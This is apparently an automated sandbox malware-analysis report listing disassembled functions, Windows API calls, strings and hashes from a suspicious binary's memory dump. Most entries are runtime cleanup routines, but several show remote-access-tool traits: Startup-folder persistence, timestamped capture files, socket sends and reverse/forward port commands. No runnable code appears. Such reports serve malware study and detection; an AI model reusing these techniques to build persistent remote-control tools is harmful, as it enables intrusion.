                                                                                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004500A6
                                                                                                                                                                                                                                • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004500C8
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004500DD
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004500E8
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0045010A
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0045011D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0045012B
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00450136
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0045016E
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00450175
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00450192
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004501AA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                              • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                                                              • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10007D32
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10007D72
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10007D80
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                              • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                                                              • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                                                                                                                              • String ID: 0DG$TTF$WDH$BG
                                                                                                                                                                                                                              • API String ID: 65172268-1505503698
                                                                                                                                                                                                                              • Opcode ID: 44140c6f843b1e29173e6648680ffd85a82a5fa34de72e81eddd5f548e96793c
                                                                                                                                                                                                                              • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44140c6f843b1e29173e6648680ffd85a82a5fa34de72e81eddd5f548e96793c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 0-3907804496
                                                                                                                                                                                                                              • Opcode ID: 04894e0a93b524abfc38153a41ff29de28cc7cf8ead271b478220501d6c19c9b
                                                                                                                                                                                                                              • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04894e0a93b524abfc38153a41ff29de28cc7cf8ead271b478220501d6c19c9b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?), ref: 004393B9
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004393C6
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,?), ref: 004393F9
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00439403
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000), ref: 0043944D
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00439457
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043946A
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00439471
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2441525078-0
                                                                                                                                                                                                                              • Opcode ID: 2ae200d90bd4707cf84e44c7e7c38afbf302cb9e64b43d1da2d1331bd94df5e0
                                                                                                                                                                                                                              • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ae200d90bd4707cf84e44c7e7c38afbf302cb9e64b43d1da2d1331bd94df5e0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00474358,00000005,00000004,00000000,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,0046662C,00000000,0000000E), ref: 0040BC8E
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 0040BE9B
                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                                                                                              • String ID: 6$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe$BG$BG
                                                                                                                                                                                                                              • API String ID: 2323119506-1377930861
                                                                                                                                                                                                                              • Opcode ID: 2ab649c3ba73a70816a6e43179e3de047985b58abb1f551d321f2ad11d541b57
                                                                                                                                                                                                                              • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ab649c3ba73a70816a6e43179e3de047985b58abb1f551d321f2ad11d541b57
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00419365
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Sleep$CreateDirectoryLocalTime
                                                                                                                                                                                                                              • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                                                                                              • API String ID: 714869764-65789007
                                                                                                                                                                                                                              • Opcode ID: 33bb545f1bb064cadf0884e11be1bb05e907684f471e40db7084d3185748dfb6
                                                                                                                                                                                                                              • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33bb545f1bb064cadf0884e11be1bb05e907684f471e40db7084d3185748dfb6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000284,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                                                              • String ID: (UF$8UF$DUF
                                                                                                                                                                                                                              • API String ID: 2956720200-3365735178
                                                                                                                                                                                                                              • Opcode ID: f0e13cac5f2d8c2eb3a0edff5db0cf3d01225b066c4fc3831099835aefba0304
                                                                                                                                                                                                                              • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0e13cac5f2d8c2eb3a0edff5db0cf3d01225b066c4fc3831099835aefba0304
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00416EF0
                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000284,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                                                                                                                              • String ID: <$@$@FG$@FG$TUF
                                                                                                                                                                                                                              • API String ID: 1107811701-3315534519
                                                                                                                                                                                                                              • Opcode ID: 0e2d6ad79a080fb4cd8cf88aeb906b0622b8e54a3b7bb188f4510e64744bb246
                                                                                                                                                                                                                              • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e2d6ad79a080fb4cd8cf88aeb906b0622b8e54a3b7bb188f4510e64744bb246
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446DDF
                                                                                                                                                                                                                                • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446DEB
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446DF6
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E01
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E0C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E17
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E22
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E2D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E38
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E46
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                                                              • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 100059EA
                                                                                                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                              • _free.LIBCMT ref: 100059F6
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10005A01
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10005A17
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10005A22
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10005A38
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10005A43
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10005A51
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                                                              • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000), ref: 00407F4C
                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseHandle$CreatePointerReadSize
                                                                                                                                                                                                                              • String ID: >G
                                                                                                                                                                                                                              • API String ID: 1759864157-1296849874
                                                                                                                                                                                                                              • Opcode ID: b83ccb073eafe3589cbf5291785c700d282662e5dcc798be5fa6548fdd9a4cc7
                                                                                                                                                                                                                              • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b83ccb073eafe3589cbf5291785c700d282662e5dcc798be5fa6548fdd9a4cc7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Eventinet_ntoa
                                                                                                                                                                                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                                                                                                                              • API String ID: 3578746661-4192532303
                                                                                                                                                                                                                              • Opcode ID: 60fdcb1f6663c5de7e7cb36e8344d3969ca0720d3b71cd10889ea391db8c9106
                                                                                                                                                                                                                              • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60fdcb1f6663c5de7e7cb36e8344d3969ca0720d3b71cd10889ea391db8c9106
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000), ref: 0041A2FF
                                                                                                                                                                                                                              • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Event$CloseCreateExistsFileHandleObjectPathSendSingleStringWait
                                                                                                                                                                                                                              • String ID: TUF$open "
                                                                                                                                                                                                                              • API String ID: 1811012380-2979349893
                                                                                                                                                                                                                              • Opcode ID: a13cad6031b8f459ce87e1bac6fc86a33f567f9bf89c91429c39f5aa6750865f
                                                                                                                                                                                                                              • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a13cad6031b8f459ce87e1bac6fc86a33f567f9bf89c91429c39f5aa6750865f
